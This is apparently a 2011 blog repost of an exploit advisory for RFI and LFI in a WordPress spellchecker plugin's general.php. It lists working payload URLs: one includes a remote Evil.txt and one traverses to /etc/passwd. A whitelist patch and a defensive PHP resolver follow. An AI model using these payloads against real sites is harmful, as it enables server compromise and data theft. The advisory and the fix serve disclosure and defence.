Friday, April 15, 2011

0-day RFI & LFI in WordPress 3.1 Plugin Vulnerability RELEASED

Web References:-
http://packetstormsecurity.org/files/100297/WordPress-Spellchecker-Local-File-Inclusion-Remote-File-Inclusion.html
http://packetstorm.linuxsecurity.com/1104-exploits/wpspellchecker-rfilfi.txt
http://securityreason.com/wlb_show/WLB-2011040079
http://www.securityhome.eu/exploits/exploit.php?eid=13843116614da43163eb7a76.20091642
---------------------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
======++++++  RFI & LFI Wordpress Spellchecker Plugin Vulnerability  ++++++======
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
---------------------------------------------------------------------------------
Released Date = 12/4/2011
---------------------------------------------------------------------------------
Author = Dr Trojan (www.paksecteam.com)
---------------------------------------------------------------------------------
Greets = Sacred1947 - ShozY - Shadow008 - HackerBradri - Death Angel - Yasir Fati
---------------------------------------------------------------------------------
Version = 3.1
---------------------------------------------------------------------------------
Tested On = Windows 7 & Xampp
---------------------------------------------------------------------------------
Rfi Exploit = /general.php?file=http://sitename.com/Evil.txt?
Lfi Exploit = /general.php?file=../../../../../../../etc/passwd
Root Location = wordpress/wp-includes/js/tinymce/plugins/spellchecker/includes/general.php
Web Location = www.sitename.com/general.php?file=
P.O.C:-
RFI Example = www.sitename.com/general.php?file=http://sitename.com/Evil.txt?
LFI Example = www.sitename.com/general.php?file=../../../../../../../etc/passwd

User Input = $_GET
Potentially Vulnerable Function = require
Vulnerability description:-
An attacker might include local or remote PHP files, or read non-PHP files, through this vulnerability.
User-tainted data is used when building the name of the file that is then included into the current file.
PHP code in that file is evaluated; non-PHP content is embedded into the output.
This vulnerability can lead to full server compromise.
Vulnerable Example Code =

Patch for vulnerability: Build a whitelist of allowed file names; do not merely restrict the file name to specific paths or extensions.
<?php $files = array("ALLOWED_FILE.php" /* first entry truncated in source; placeholder */, "main.php"); if (!in_array($_GET["file"], $files)) exit; ?>
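The whitelist patch above is the right idea; the following is an added example (not the advisory's text and not WordPress or TinyMCE code) showing how a defender would wrap it into a resolver that also confirms the resolved path stays inside the includes directory. The directory it creates and the file names in $allowed are assumptions for the demo; the two rejected payloads are the advisory's own PoC values.

```php
<?php
declare(strict_types=1);

/**
 * Resolve a user-supplied "file" parameter to an include path, or return null.
 * Step 1 is the advisory's whitelist (in_array, strict comparison).
 * Step 2 is defence in depth: the resolved path must still live under $base_dir,
 * so neither "../" sequences nor URL wrappers can reach anything else.
 */
function resolve_include(string $file, string $base_dir, array $allowed): ?string
{
    // 1. Exact-match whitelist: only names we wrote ourselves are acceptable.
    if (!in_array($file, $allowed, true)) {
        return null;
    }
    // 2. The real, symlink-resolved path must be inside the base directory.
    $base = realpath($base_dir);
    $path = realpath($base_dir . DIRECTORY_SEPARATOR . $file);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo directory (assumption) with two files the plugin may include.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'spellchecker_demo_' . getmypid();
mkdir($base, 0700);
file_put_contents($base . DIRECTORY_SEPARATOR . 'main.php', "<?php echo 'main ok';");
file_put_contents($base . DIRECTORY_SEPARATOR . 'utils.php', "<?php echo 'utils ok';");
$allowed = ['main.php', 'utils.php']; // assumption: the plugin's legitimate include names

$tests = [
    'main.php',                            // legitimate request
    '../../../../../../../etc/passwd',     // LFI payload from the advisory
    'http://sitename.com/Evil.txt?',       // RFI payload from the advisory
    'main.php/../../../etc/passwd',        // traversal hidden behind an allowed prefix
];
foreach ($tests as $t) {
    $resolved = resolve_include($t, $base, $allowed);
    echo str_pad($t, 38) . ' => '
        . ($resolved === null ? 'REJECTED' : 'include ' . basename($resolved))
        . PHP_EOL;
}
// Only 'main.php' resolves; the other three are rejected before any require().

// Remove the constructed demo directory.
array_map('unlink', glob($base . DIRECTORY_SEPARATOR . '*.php'));
rmdir($base);
```

The strict third argument to in_array avoids PHP's loose comparison surprises, and the realpath prefix check catches cases the whitelist alone would miss if someone later loosens it to a prefix or extension match, which is exactly the mistake the patch note warns against.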

Root@Paki -- Dr Trojan-H4x0rL1f3 -- © 2008 Template by Dicas Blogger.